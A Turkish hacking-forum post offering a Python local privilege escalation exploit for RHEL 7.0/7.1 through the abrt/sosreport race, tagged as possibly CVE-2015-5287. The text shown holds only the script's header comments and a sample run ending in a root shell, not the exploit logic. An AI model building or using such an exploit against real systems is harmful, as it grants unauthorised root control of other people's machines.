RHEL 7.0/7.1 - Local Root Exploit

'Exploitler' forumunda Sagittarius tarafından 2 Aralık 2017 tarihinde açılan konu

  1. Sagittarius DAYI Onursal Ünvan

    Mesaj:
    49
    Beğeniler:
    111
    Cinsiyet:
    Erkek
    Şehir:
    Hollanda
    RHEL 7.0/7.1 - Local Root Exploit


    Kod:
    #!/usr/bin/python
    # CVE-2015-5287 (?)
    # abrt/sosreport RHEL 7.0/7.1 local root
    # rebel 09/2015
    # [user@localhost ~]$ python sosreport-rhel7.py
    # crashing pid 19143
    # waiting for dump directory
    # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
    # waiting for sosreport directory
    # sosreport: sosreport-localhost.localdomain-20151130194114
    # waiting for tmpfiles
    # tmpfiles: [’tmpurfpyY’, ’tmpYnCfnQ’]
    # moving directory
    # moving tmpfiles
    # tmpurfpyY -> tmpurfpyY.old
    # tmpYnCfnQ -> tmpYnCfnQ.old
    # waiting for sosreport to finish (can take several minutes)........................................done
    # success
    # bash-4.2# id
    # uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    # bash-4.2# cat /etc/redhat-release
    # Red Hat Enterprise Linux Server release 7.1 (Maipo)
     
Yükleniyor...

Bu Sayfayı Paylaş